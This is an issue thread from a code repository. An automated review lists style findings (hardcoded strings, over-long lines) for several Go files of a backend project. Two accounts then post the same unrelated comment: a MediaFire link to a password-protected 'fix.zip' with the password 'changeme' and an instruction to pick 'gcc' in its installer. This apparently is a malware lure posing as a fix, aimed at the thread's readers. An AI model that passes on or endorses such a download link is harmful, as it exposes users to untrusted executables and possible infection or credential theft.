### ISSUE TITLE
Issue-🔧 修复crontab错误

Merge pull request #13 from WhitePaper233/dev

### ISSUE THREAD

**Issue by kentaurse** [kentaurse/zewise-backend-lagacy#99]
Automated Review Comments
Issues in controllers/user.go:
  - (2, 'Hardcoded string found')
  - (3, 'Hardcoded string found')
  - (4, 'Hardcoded string found')
  - (5, 'Hardcoded string found')
  - (20, 'Line exceeds 80 characters')
  - (29, 'Line exceeds 80 characters')
  - (55, 'Hardcoded string found')
  - (61, 'Line exceeds 80 characters')
  - (70, 'Hardcoded string found')
  - (96, 'Hardcoded string found')
  - (102, 'Line exceeds 80 characters')
  - (111, 'Hardcoded string found')
Issues in main.go:
  - (26, 'Line exceeds 80 characters')
  - (27, 'Line exceeds 80 characters')
  - (28, 'Line exceeds 80 characters')
  - (29, 'Line exceeds 80 characters')
  - (30, 'Line exceeds 80 characters')
  - (31, 'Line exceeds 80 characters')
  - (36, 'Line exceeds 80 characters')
  - (37, 'Line exceeds 80 characters')
  - (38, 'Line exceeds 80 characters')
  - (39, 'Line exceeds 80 characters')
  - (44, 'Line exceeds 80 characters')
  - (45, 'Line exceeds 80 characters')
  - (46, 'Line exceeds 80 characters')
  - (47, 'Line exceeds 80 characters')
  - (51, 'Line exceeds 80 characters')
Issues in models/user.go:
  - (30, 'Line exceeds 80 characters')
  - (33, 'Line exceeds 80 characters')
  - (35, 'Line exceeds 80 characters')
  - (36, 'Line exceeds 80 characters')
  - (37, 'Line exceeds 80 characters')
Issues in services/user.go:
  - (4, 'Hardcoded string found')
  - (6, 'Hardcoded string found')
  - (7, 'Hardcoded string found')
  - (8, 'Hardcoded string found')
  - (11, 'Line exceeds 80 characters')
  - (26, 'Line exceeds 80 characters')
  - (45, 'Line exceeds 80 characters')
  - (47, 'Hardcoded string found')
  - (52, 'Hardcoded string found')
  - (58, 'Hardcoded string found')
Issues in stores/user.go:
  - (9, 'Line exceeds 80 characters')
  - (22, 'Line exceeds 80 characters')
  - (23, 'Line exceeds 80 characters')
  - (27, 'Line exceeds 80 characters')
  - (41, 'Line exceeds 80 characters')
  - (44, 'Line exceeds 80 characters')
  - (70, 'Line exceeds 80 characters')
  - (111, 'Line exceeds 80 characters')
  - (114, 'Line exceeds 80 characters')
  - (129, 'Line exceeds 80 characters')
  - (177, 'Line exceeds 80 characters')
  - (201, 'Line exceeds 80 characters')

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
